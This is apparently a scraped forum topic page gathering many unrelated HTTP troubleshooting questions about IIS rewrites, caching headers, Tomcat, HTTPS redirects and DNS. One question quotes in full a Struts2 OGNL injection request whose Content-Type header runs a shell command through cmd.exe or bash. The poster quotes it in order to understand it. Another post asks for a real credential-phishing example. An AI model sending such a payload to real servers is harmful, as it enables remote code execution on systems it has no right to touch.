Want to protect your cyber security and still get fast solutions? Ask a secure question today.Go Premium


HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Share tech news, updates, or what's on your mind.

Sign up to Post

Our mobile app is experiencing a strange behavior in a place where they have WiFi. If the app uses THAT WiFi there's an HTTP POST request (to our API) that gets the response content truncated randomly (not always truncated, and if truncated not always at the same place).

I made several tests at that place (using the app and also Postman) and found that on mobile data the response always comes OK, but when connecting with that WiFi the response sometimes gets truncated. Also, I saw that other API requests get the response correctly, even when the content length is 10 times bigger (I thought that maybe the response was too big, but we're talking about just 10Kb).

The failing request is a regular POST request sent to a REST API made with Dropwizard. The request gets processed correctly on the server, which returns status 200 and the content. The client gets the status 200 but the content is truncated, so the whole operation can't be finished.

I wonder if there's something wrong with that WiFi, or if this kind of response errors must be expected and dealt by our application. I haven't seen this behavior before.

Modern healthcare requires a modern cloud. View this brief video to understand how the Concerto Cloud for Healthcare can help your organization.

I want to create an IIS URL rewrite rule which should make the site to respond with the same content on any request. This rule is to be applied when the site goes under a maintenance.
My rule looks like the following:
                <rule name="Stub" enabled="true" patternSyntax="ECMAScript" stopProcessing="true">
                    <match url=".*" />
                    <action type="Rewrite" url="/maintenance.htm?URL={R:0}" appendQueryString="true" logRewrittenUrl="true" />
                        <add input="{REMOTE_ADDR}" pattern="" negate="true" />
                        <add input="{REMOTE_ADDR}" pattern="172.31.3" negate="true" />

Open in new window

It works perfectly for any request to resources in the root folder. But on any request to a sub-directory the server responds with 403 Forbidden

For example, a request like http://mysite.com/s.gif correctly returns the content of the file maintenance.htm (located in the site's root folder), but a request like http://mysite.com/2/s.gif  returns
 <h2>403 - Forbidden: Access is denied.</h2>
  <h3>You do not have permission to view this directory or page using the credentials that you supplied.</h3>

Open in new window

(there is a file /2/s.gif and it is correctly returned when the rule is disabled).
In the W3SVC log file I can see:
2017-12-20 22:01:36 GET /maintenance.htm URL=2/s.gif 443 - Mozilla/5.0+(Windows+NT+6.1;+WOW64;+rv:52.0)+Gecko/20100101+Sea-Monkey/2.49.1+(similar+to+Firefox/52.0) - 403 18 0 78

Open in new window

Please help.
My question is about: https://www.mnot.net/blog/2007/05/15/expires_max-age

They're saying:

The problem with that line of reasoning is that HTTP versions aren’t black and white like this; just because something advertises itself as HTTP/1.0, doesn’t mean it doesn’t understand HTTP/1.1 (see RFC2145 for more).

But here they are saying:


If a response includes both an Expires header and a max-age directive, the max-age directive overrides the Expires header, even if the Expires header is more restrictive. This rule allows an origin server to provide, for a given response, a longer expiration time to an HTTP/1.1 (or later) cache than to an HTTP/1.0 cache.

So or the article is incorrect, or W3 is incorrect (or I'm wrong :p). With the last sentence, W3 means you can give a different expiration time to a HTTP/1.1 cache (or later), compared with a HTTP/1.0 cache. You can do this by using max-age and the Expires header.
So they can only say something like that, by assuming the HTTP/1.0 cache will ignore the max-age, because otherwise you will just have the same expiration time for all the caches (HTTP/1.0 and HTTP/1.1 et cetera).

So what is true about HTTP/1.0 caches understanding max-age?

In this sample GET request

GET / HTTP/1.1
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='echo "Struts2045"').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/bash','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Accept: */*
Accept-Language: zh-cn
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1)
Connection: Keep-Alive

The content-type begins with something that is not normal. Is it trying to get the webserver to process it and execute something?  I also see java.lang so it is trying to call a java function.   What is it trying to do with java?

What is it doing with the command prompt and shell bash command prompt?

What is the purpose of echoing STRUSTS2045?
This is a great video (however the links no longer work):
I need a real life example of IF someone clicks on a bad link via email or whatever avenue how the redirected website collects their credentials. Anyone have any good ones?

Hello , does anyone knwo how to transfer iPhone contacts and messages to Android phone without any loss ? i've tried many ways to transfer them , but always fail ,and i don't how to connect the differen operation phones ,
how can I disable HTTPS and enable HTTP on apache Tomcat?
Based on my researches I have to modify the server.xml in the root folder of apache tomcat. Must I modify the connector? how?
For my Webapplication I'm connecting to the port 8443
<?xml version='1.0' encoding='utf-8'?>
  Licensed to the Apache Software Foundation (ASF) under one or more
  contributor license agreements.  See the NOTICE file distributed with
  this work for additional information regarding copyright ownership.
  The ASF licenses this file to You under the Apache License, Version 2.0
  (the "License"); you may not use this file except in compliance with
  the License.  You may obtain a copy of the License at


  Unless required by applicable law or agreed to in writing, software
  distributed under the License is distributed on an "AS IS" BASIS,
  See the License for the specific language governing permissions and
  limitations under the License.
<!-- Note:  A "Server" is not itself a "Container", so you may not
     define subcomponents such as "Valves" at this level.
     Documentation at /docs/config/server.html
<Server port="-1" shutdown="SHUTDOWN">
  <!-- Security listener. Documentation at /docs/config/listeners.html
  <Listener className="org.apache.catalina.security.SecurityListener" />
  <!--APR library loader. Documentation at 

Open in new window

How to display html detail when clicking submipls
In internet explorer i am able to access a https site and download a file. i have to use an username and password to access the site first.
However, when i enter the URL and credentials in SSIS using the HTTP connection managerand press the test connection button,  i get the message:

The remote server returned an error: (401) Unauthorized.

Any ideas why this is happening. The username and password are correct.

Can i use an https site in a http connection?

Any help appreciated.

Hi Guys,

We wrote an application that downloads json files down to about 80/90 client machines, we have reworked the mechanism but cant get it work correctly

I want to know how we could enable our server to send http status code responses then I can use the reponse.statusCode to see if a new file is available and make this whole thing a lot easier and more robust.
What does it mean to be "Always On"?
What does it mean to be "Always On"?

Is your cloud always on? With an Always On cloud you won't have to worry about downtime for maintenance or software application code updates, ensuring that your bottom line isn't affected.

I have used 3 set of codes(where I used Indy10.6.2 component), which doesn't show any errors, but i can't able to send SMS through the code. Please help me to send me the Sms through Delphi code

The code which I used is...

  URL = 'https://api.bulksmsgateway.in/send/?username=****&hash=****&sender=TXTLCL&numbers=9198........&message=HISUNDAR';
  //URL = 'https://api.textlocal.in/send/?username=*****&hash=******&sender=TXTLCL&numbers=9198...&message=HISUNDAR';
  ResponseSize = 1024;
  hSession, hURL: HInternet;
  Request: String;
  ResponseLength: Cardinal;
  hSession := InternetOpen('TEST', INTERNET_OPEN_TYPE_PRECONFIG, nil, nil, 0);
    Request := Format(URL,[Username,Password,Sender,Numbers,HttpEncode(Message1)]);
    hURL := InternetOpenURL(hSession, PChar(Request), nil, 0,0,0);
      SetLength(Result, ResponseSize);
      InternetReadFile(hURL, PChar(Result), ResponseSize, ResponseLength);
      SetLength(Result, ResponseLength);

http : TIdHTTP;
IdSSL : TIdSSLIOHandlerSocketOpenSSL;
 http := TIdHTTP.Create(nil);
 IdSSL := TIdSSLIOHandlerSocketOpenSSL.Create(nil);
  Http.ReadTimeout := 30000;
  Http.IOHandler := IdSSL;
  IdSSL.SSLOptions.Method := sslvTLSv1;
  Http.Request.BasicAuthentication := True;
 // IdSSL.SSLOptions.Method := sslvTLSv1;
I am using the following query to get the CNAME record to load my site properly. The issue: The code below works ... but only if refreshed a couple of times.

Query ::

$recsDNS = dns_get_record($_SERVER['HTTP_HOST'], DNS_CNAME );

Not getting CNAME records Properly, SOme times coming and some times Not.

If I use DNS_ALL :: After refreshing 3 to 4 times i am getting CNAME records.
I have a computer here that almost daily will stop bringing up web sites.  I've read more than I can even tell you and tried  everything I could to see some rhyme or reason why this is happening.  I can ping the address from a command line or the domain name.  Outlook isn't affected even though it's hosted offsite.  I can't access the web whether I put in  the Domain name or IP in the URL field.

I've flushed the ARP cache more than once, stopped and restarted dnscache, flushed dns, scanned for trojans, malware, etc.  And the only thing that will get it running again is to restart the computer or flush dns.  We recently went through a DNS server change but we kept the same IP address.  This also doesn't affect all the computers on the domain.

This is a Windows 7 Pro PC on a 2012 R2 domain.

I can't figure it out.  I am open for ideas.

Thank you!
I had this question after viewing XP driver for Iomega Zip with USB-to-serial converter.

Does this driver help you?
The second download button.

That download was only basically a blank file.

Is there some other way to get an original driver as all leads I have found are for updates.

Thank you,
Hello all,

My site was working fine under the regular http site.  When i was force to move over to secure https site, ajax stop working.  I don't know what i am doing wrong.

the code is below:
				type: "POST",
				url: "update_location.php",
				success: function(data){

Open in new window

Dears, kindly note that I have to build  have to build the server which host the service as windows form application c#, and the client also is windows from application c#, so I tried to create new WCF Service Library, now how can I host it by the server and access it by the client?

the client have to connect to the server using http protocol as it is far from it,

so, is there a possible scenario for that?
Hi experts,
Im planning a multi-location Webserver cluster. I test how the browsers are handling multiple A records.

Test configuration was:
four A records to different IP addresses, only one was IP of a working webserver.

I used a Wireshark to see what is going on and there are the results from Windows 10 machine:
IE and Edge takes 7 seconds timeout for each A record. in the worse case when the A record of working webserver is on the last tried IP opening of page takes 21 seconds.

In Chrome and FireFox, each try takes 21 seconds, so worst case takes 63 seconds to open a page.

Once the page was opened, all browsers are holding the working IP so after initial connection it is fast, as usual.

Is there any other method that is faster on failover?
So, I have an IIS 7 web server that is getting flagged on a security audit because of a certificate name mismatch.  The problem is that you can browse to the public IP address ( and you will get a certificate error, because that public IP address isn't on the certificate.  I have a rewrite rule in IIS to redirect to https://my.domain.com, but that doesn't happen until after the SSL handshake because SSL happens before http.

So, I am left with a few ways of fixing it:
1. Adding the IP address to the certificate, but apparenlty that is no longer going to be supported after this month (Oct. 2016).
2. Create a redirect/rewrite rule (either in IIS or on my SonicWALL firewall) that will rewrite the IP address to the URL before the SSL handshake.  I'm not even sure if that's possible.
3. I guess the third option would be to have IIS block the public IP address, and only respond to requests for the URL, but I'm not sure how to do that.

Anyone have any ideas?

i've an open source program called lime for making survey, this program using apachi service in hosting not IIS how can i make the user access the url using https not http because we'll going o publish it?
Free Tool: Path Explorer
LVL 11
Free Tool: Path Explorer

An intuitive utility to help find the CSS path to UI elements on a webpage. These paths are used frequently in a variety of front-end development and QA automation tasks.

One of a set of tools we're offering as a way of saying thank you for being a part of the community.

I have installed java SpagoBI 5.2 app from .war successfully. I can start the SpagoBI from Tomcat 8 manager-app by double-click on SpagoBI on the list - works OK
When I use  the url: http://localhost:8080/SpagoBI - the app does not start - error 404 1008.
I spent some time for finding a reason but no success so far ..
Can somebody give me an advice ?
I set up a helpdesk solution with my company.  I would like to put a hostname of the site into the browser versus an IP address.  I set up an a record in DNS and a cname record pointing to the a record.  I set up a binding in IIS on the server the site is on and still can't connect to it.
I am trying to create a rewrite rule that will filter an https url that was rewritten from http, and redirect it to another web server. The rewrite to HTTPS works, but the resulting https url generates a 404 error and does not redirect. I have been able to successfully test redirect url requests over port 80 but not https. Any suggestions?

Here is what I have so far:

RewriteEngine on
RewriteCond %{SERVER_PORT} !^443$
RewriteRule ^/(.*) https://%{HTTP_HOST}/$1 [NC,R,L]

I've tried

RewriteCond "https://%{HTTP_HOST}" "^/~username(.*)"
RewriteCond "%{SERVER_PORT}" "^443$"
RewriteRule "^/?(.*) "http://username.domain.com"


RedirectMatch "^/~username(.*)" "http://username.domain.com"
Using an imac
Hi, i have a website running IIS 8.5 (win 2012 R2) which runs over HTTP. i have a virtual directory within the same website which i want to secure over HTTPS.
i have both HTTP & HTTPS bindings for the website.

I have a citrix netscaler in front of the website which has been configured to perform SSL offload. the service on the netscaler which sends traffic to the website is both HTTP& HTTPS
I have disabled anonymous authentication and enabled basic authentication for the virtual directory, however i have not checked the 'Require SSL' box for the Virtual Directory.

When a client connects to the Virtual Directory via HTTP they get prompted for username & password and if they enter this, it lets them in, the same happens if the connct via HTTPS

What i need to do is redirecrt/ rewrite the HTTP connection just for the Virtual Directory so that it forces it to be a HTTPS connection. any ideas?

many thanks
before couple of weeks ago i was working for a company named as europac and i was continuously in contact with them but 2 days before i had sent them a mail i got a reply in the form of :-

Delivery to the following recipient failed permanently:


Technical details of permanent failure:
Google tried to deliver your message, but it was rejected by the server for the recipient domain europacgroup.info by smtp.secureserver.net. [].

The error that the other server returned was:
550 5.1.1 <hr@europacgroup.info> Recipient not found.  <http://x.co/irbounce>

HTTP Protocol

The Hypertext Transfer Protocol (HTTP) is an application protocol for distributed, collaborative, hypermedia information systems. Hypertext is structured text that uses logical links (hyperlinks) between nodes containing text. HTTP is the protocol to exchange or transfer hypertext. HTTP functions as a request-response protocol in the client-server computing model. HTTP is designed to permit intermediate network elements to improve or enable communications between clients and servers. HTTP is an application layer protocol designed within the framework of the Internet Protocol Suite; it presumes an underlying and reliable transport layer protocol.

Top Experts In
HTTP Protocol